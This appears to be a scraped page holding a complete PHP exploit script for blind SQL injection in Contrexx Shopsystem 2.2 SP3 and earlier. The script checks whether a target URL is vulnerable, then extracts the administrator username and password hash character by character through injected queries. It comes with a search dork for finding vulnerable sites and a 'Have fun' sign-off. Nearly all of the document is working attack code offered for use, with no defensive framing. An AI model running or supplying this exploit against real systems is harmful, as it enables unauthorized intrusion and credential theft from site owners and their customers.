扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 |
#!/usr/bin/php <?php /* Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit Exploit written by: Penguin Exploit: index.php?section=shop&catId=[VALID categoryid] and [YOUR BLIND SQL CODE] Exploit tested on: Debian 6, Ubuntu Linux 11.04 Software price: abount 700 CHF Vendor: http://www.contrexx.com Found by: Penguin Version: =< 2.2 SP 3 Dork: inurl:index.php?section=shop&catId= Vendor: www.contrexx.com Visit: www.null-sector.info Greets to: Blacktiger/Luxy, ErrorX, hAgBaRd2ooo, KrimiX, zYiix, reutz/head */ echo "#######################################\r\n"; echo "# Contrexx Shopsystem Exploit #\r\n"; echo "# Exploit Type: Blind SQL Injection #\r\n"; echo "# Programmed by: Penguin#\r\n"; echo "# Visit www.null-sector.info#\r\n"; echo "#######################################\r\n"; if($argc < 4) { echo "Usage: ./exploit.php [TARGET_URL] [CATID] (Admin User Limit)\r\n"; echo "TARGET_URL = http://demo.de/index.php\r\n"; echo "CATID = CategoryId (MUST BE VALID!)\r\n"; echo "Admin User Limit = Limit x,0 @ Selecting! Standard: 0\r\n"; die(); } // Config Variables $target_url = $argv[1] . "?section=shop&catId=" . $argv[2]; $charset_start_usr = 33; $charset_end_usr = 126; $charset_hash = Array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $toLength = 100; //Functions function getUsername($toLength, $charset_start, $charset_end, $target_url,$limit) { $username = ""; // Get Length $length = -1; for($i=0;$i<$toLength;$i++) { $url = $target_url . "/**/and/**/(select/**/length(username)/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1)=" . $i; $src = file_get_contents($url); if(testIt($src) == true) { $length = $i; break; } } if ($length == -1) { die("There was a problem @ fetching username length :(\r\n"); } echo "Username length: $length !\r\n"; $username = ""; echo "Username: "; for($k=0;$k<$length;$k++) { $charToAdd = ""; for($c=$charset_start;$c<$charset_end;$c++) { $p = $k+1; $src = file_get_contents($target_url . "/**/and/**/substring((select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($c)"); if(testIt($src) == true) { $charToAdd = $c; break; } } echo chr($c); $username .= chr($c); } echo "\r\n"; return $username; } function getHash($toLength, $charset, $target_url,$limit) { // Get Hash $hash = ""; echo "Hash: "; for($k=0;$k<32;$k++) { $charToAdd = ""; for($c=0;$c<count($charset);$c++) { $p = $k+1; $z = $charset[$c]; $src = file_get_contents($target_url . "/**/and/**/substring((select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($z)"); file_put_contents("test.html",$src); if(testIt($src) == true) { $charToAdd = $charset[$c]; break; } } echo chr($charToAdd); $hash .= chr($charToAdd); } echo "\r\n"; return $hash; } function testIt($src) { $check = explode("<div class=\"description\">",$src); if(count($check) >= 2) { return true; } return false; } echo "Starting exploit....\r\nChecking if Vulnerable..."; $check = file_get_contents($target_url . "'"); if(testIt($check) == true) { die("Target is not Vulnerable :(\r\n"); } $myLimit = $argv[3]; echo "Target is Vulnerable :)\r\n"; echo "Starting the SQL Injection...\r\n"; echo "Fetching Username...\r\n"; $username = getUsername($toLength, $charset_start_usr, $charset_end_usr, $target_url,$myLimit); $hash = getHash($toLength,$charset_hash,$target_url,$myLimit); echo "Exploited Successfully!\r\n"; echo "Full Logindata: $username : $hash\r\n"; echo "Have fun ;)\r\n"; ?> |
体验盒子
